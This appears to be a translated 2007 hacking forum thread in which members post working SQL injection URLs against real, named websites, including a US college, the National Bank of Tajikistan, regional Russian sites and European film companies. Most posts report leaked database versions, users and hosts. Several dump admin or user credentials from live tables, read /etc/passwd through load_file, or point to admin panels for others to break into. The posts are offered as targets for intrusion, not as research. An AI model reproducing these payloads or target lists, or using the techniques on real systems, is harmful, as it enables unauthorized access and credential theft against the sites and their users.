SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    http://www.lsg.ru/index.php?page=sexolog&art=-1'+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9/*

    4.1.22-standard/gilboev_44/gilboev_1@localhost

    -----------------------------------------------------------------

    http://www.beloretsk.ru/news/view.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10/*

    4.0.27-max-log/beloret/beloret@v4.valuehost.ru
     
    2 people like this.
  2. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    edu+MSSQL

    www.lasc.edu

    Code:
    _http://www.lasc.edu/main.asp?id=-1'+or+1=@@version--
    Version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    User:lasc

    DBName:lasc

    Stumbled on it by accident; whoever is interested, dig further.
     
    3 people like this.
  3. ElteRUS

    ElteRUS Elder

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    http://www.moldova.ru/index.php?tabName=articles&owner=19&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/*

    4.1.19-standard-log/moldova_moldova/moldova_design@sr.dualg.com

    -------------------------------------------------------------------

    infobank.mossport.ru

    http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=@@version

    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    DB: casper
    User:cabi



    http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=(select+top+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(passw+as+nvarchar)+from+tMKSInetUser+where+UserID=1)--

    login/password
     
    1 person likes this.
  4. -MoLoToK-

    -MoLoToK- Elder

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.llrickard.com/show_details.php?id=1179933989+union+select+1,2,3,4,5,6,7,8,9/*
    doesn't output the tables
    --------------------------------------------------
    Code:
    http://www.ewms.ltd.uk/show_details.php?recordID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
    version:4.1.22-standard-log
    user:
    ukbf@server213-171-219-234.livedns.org.uk
    DB:
    readymade
    tables: news, users
    --------------------------------------------------
    Code:
    http://www.karakteruitgevers.nl/show_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
    Wow, so many tables
     
    #3464 -MoLoToK-, 29 Oct 2007
    Last edited: 29 Oct 2007
    2 people like this.
  5. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    97
    Likes Received:
    41
    Reputations:
    6
    http://www.lasc.edu/admin/ - admin panel

    Tables:
    -----
    Dumped from users:
    Code:
    http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)--
    Code:
    http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users++where+username+not+in('chilinma','larsonl','gallagherm','MageeCL'))--
    ----
    Too lazy to dig further... ^^


    Iceangel_
    What makes you think it is even there?
     
    2 people like this.
  6. Elvis000

    Elvis000 Patriot

    Joined:
    23 Apr 2007
    Messages:
    607
    Likes Received:
    331
    Reputations:
    148
    Parapsychology - Paths to Truth from RIN.RU

    http://istina.rin.ru/cgi-bin/print.pl?sait=2&id=-1'+UNION+SELECT+1,2,3/* everything is readable in the page title.

    user:postcards@192.168.1.234
    version:4.0.26
    base:ufo

    There is access to mysql.user, but it gives nothing besides the names
    chat, igor, sergey, qmail; at least I couldn't get more.

    was read:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nol

    /var/www/html/hosts/nataly/istina/ I think a shell can be obtained, not sure, I'm still learning.

    The antiboyan already has money.rin.ru, state.rin.ru
     
    #3466 Elvis000, 30 Oct 2007
    Last edited: 30 Oct 2007
    2 people like this.
  7. ElteRUS

    ElteRUS Elder

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    izhbowling.ru

    http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10/*

    4.1.22-STANDARD/IZHBOWLI_DB/IZHBOWLI_US@LOCALHOST


    http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_icq),4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/*

    login/hash/UIN
     
  8. 0nep@t0p

    0nep@t0p Elder

    Joined:
    25 May 2007
    Messages:
    141
    Likes Received:
    216
    Reputations:
    17
    http://www.individual.com/
    Some large company, something like its own blog...

    Version: 4.0.14-standard-log
    User: idc_v3@localhost


    mysql.user:
    There is a table account; in it I only found one column, passwd, but I can't find the column with logins...
    The number of users is impressive: +/- 25 000
     
    #3468 0nep@t0p, 30 Oct 2007
    Last edited: 30 Oct 2007
    3 people like this.
  9. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    219
    Likes Received:
    85
    Reputations:
    16
    National Bank of Tajikistan...
    http://www.nbt.tj/en/?c=44&id=44&a=1+union+select+1,version(),user(),4,5/*
     
    2 people like this.
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    arhd.ru
    Code:
    http://arhd.ru/element.html?rid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    4.0.23-log:arhd:arhd@213.219.217.68
     
  11. Elvis000

    Elvis000 Patriot

    Joined:
    23 Apr 2007
    Messages:
    607
    Likes Received:
    331
    Reputations:
    148
    Fashion Time photo


    Code:
    http://www.ft-foto.ru/stat.php?action=article_view&id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
    user: ft_foto_ru@localhost
    version: 5.0.24a-log
    database: ft_foto_ru
     
    2 people like this.
  12. KEHT33

    KEHT33 Elder

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,3,4,5,6,7,8,9/*
    database

    HTML:
    http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,password,4,username,6,7,8,9+FROM+users/*
    admin panel login

    HTML:
    http://www.triantaphyllides.org/admin/login.php?accessdenied=%2Fadmin%2Findex.php
     
    1 person likes this.
  13. KEHT33

    KEHT33 Elder

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.corkaghpark.com/newscontent.php?id=-90%20UNION%20SELECT%201,2,3,passwd,username+FROM+users/*
    the password is encrypted, but it's super easy... the admin panel is awesome though )
     
    #3473 KEHT33, 30 Oct 2007
    Last edited: 30 Oct 2007
    1 person likes this.
  14. KEHT33

    KEHT33 Elder

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.aic.ie/site/newscontent.php?id=-8%20UNION%20SELECT%201,2,passwd,4,5+FROM+admin/*
    I think everything is clear
     
    1 person likes this.
  15. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    432
    Reputations:
    287
    bookshop.ua
    Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    db_name: Shop2
    system_user: webuser
    Here are the first 100 tables:
    Code:
    http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TypePaher','News','Visits_page','all_kn_z_1','Post','__BAKU','__Export','__OzonPicturesBig','__OzonPicturesSmall','__vw_baku','_Temp_New_Price_FileName','_vw_All_Book','_vw_BigMir_XML_currency','_vw_BigMir_XML_Item','_vw_BigMir_XML_Price','_vw_BookLit_Price','_vw_Coef_For_Report_TOP1000','_vw_CustomerGross','_vw_DeliveryToPayment','_vw_Discount_Book','_vw_New_Publishing','_vw_New_SeriesThema','_vw_OBV_Catalog','_vw_OBV_Export_1','_vw_Price','_vw_Report_TOP50_Author','_vw_Report_TOP50_Publishig','_vw_site_Menu','_vw_Subscribe_News','_vw_View_Zayavka','1c','Account_Jur','Account_Private','Action','all_kn_z','BHV','Bonus','Book_for_portal','BooksPrice','BooksZakaz','bs_ozon','BSM_BooksPrice','CatalogBooks','CatalogNum','CatalogThema','Club','Coef','cost_delivery','CounDaliv','Country','Currency','CurrencyUse','Dalivery','Date_Export','Doc','Dolg_Books','Dolg_Books_K','Dolg_Books2','Dostavka','dtproperties','Enterprise','Entr_D','Exchange','FD','ForgetOrder','GuestBook','Instore','komplekt_z','komplekt_zakaz','Konkurs','MaxRealReestrK_ID','MaxRealReestrP_ID','Message','MessageInProcedure','MiniPortal','NameNews','Not_Form_Ozon','NotMoney_NP','Obzor','Opl_N_Otpr','Other_Z_Kn','Pather','Payment','Picture_URL','Portal','Portal_Books','Postperevod','PP_ACTION','PP_ADM','PP_NAMES','PP_PAYMENTS','PP_TYPE','Publishing','QuestAnk','Question','QuestionAnswer','Quickly','ReestrK','ReestrP','Regions','Release','SendNews','Series','Shipment','Statement','subscriber','subscription','sysconstraints','syssegments','Talk','tbl_BookAdvice','tbl_Catalog','tbl_Catalog_To_Best','tbl_Catalog_TOP5_Best','tbl_CatalogToGoods','tbl_CatologTree','tbl_CorparateOrder','tbl_DistrictUa'))--
    
    Code:
    http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+cast(admPwd+as+nvarchar)%2B%27%3A%27%2Bcast(SMTPpwd+as+%20nvarchar)+%2B%27%3A%27%2Bcast(SMTPuser+as+%20nvarchar)+from+PP_ADM)--
    
    xx:xx:GeneralManager
    Didn't find the admin panel
     
    1 person likes this.
  16. lsass.exe

    lsass.exe Elder

    Joined:
    5 Aug 2007
    Messages:
    188
    Likes Received:
    161
    Reputations:
    24
    deznetr_infectio@localhost
    5.0.45-log
    deznetr_dez
     
    4 people like this.
  17. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    www.rusins.ru - Russian Insurance Center
    Code:
    http://www.rusins.ru/ru/index.php?newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9/*
    4.0.20-log:rusins:rusins@localhost

    www.csr.ru - Center for Strategic Research
    Code:
    http://www.csr.ru/theme/theme.php?idt=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    4.0.14-standard-log:csr:root@localhost
    Code:
    http://www.csr.ru/theme/theme.php?idt=-1+union+select+load_file(0x2f6574632f706173737764)+from+mysql.user/*
     
    1 person likes this.
  18. 0nep@t0p

    0nep@t0p Elder

    Joined:
    25 May 2007
    Messages:
    141
    Likes Received:
    216
    Reputations:
    17
    http://www.coogans-run.co.uk/
    Code:
    http://www.coogans-run.co.uk/h/steve-coogan-newsitem.php?id=-50+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+users/*
    Couldn't find the admin panel or any other login field...
    Version: 4.1.20
    User: hullabal00@193.111.201.160


    http://www.odeonfilm.de/
    Code:
    http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63,64+from+users/*
    In the users table I found only the column with names, login, but couldn't find the one with passwords...
    Version: 4.0.24_Debian-10sarge2-log
    User: odeonfilm@localhost


    http://www.kino.com/
    Code:
    http://www.kino.com/theatrical/th_item.php?film_id=-778+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
    Version: 4.0.12-standard
    User: kino@lma671.siteprotect.com


    http://www.zebrafilm.pl/
    Code:
    http://www.zebrafilm.pl/index.php?page=filmy&lang=eng&sub=fabula&sub2=details&filmID=-77+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,version(),28,29,30/*
    Version: 5.0.45-log
    User: zebrafilm@aoc175.rev.netart.pl
     
    4 people like this.
  19. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    chelmarket.ru
    Code:
    http://www.chelmarket.ru/show_goods_simple.php?cod=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71))/*
    4.1.15-log:chelmarket:3wchelmarket@deimos.surnet.ru

    kratos.ru - Kratos Computers
    Code:
    http://www.kratos.ru/price.php?dir=3&sub=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*
    4.1.22-standard-log:kratos_chel:kratos_chel@localhost

    trubaopt.ru
    Code:
    http://www.trubaopt.ru/?page=board&pos=0&vol=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14/*&pg=126
    4.0.26-log:udb2183:Uwww2183S@localhost

    The tables won't give in :mad:
     
    1 person likes this.
  20. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    196
    Likes Received:
    288
    Reputations:
    20
    The site is in the .de zone, so it's logical to assume the password column may be in German, i.e. passwort =) there is also an email column there
     
    5 people like this.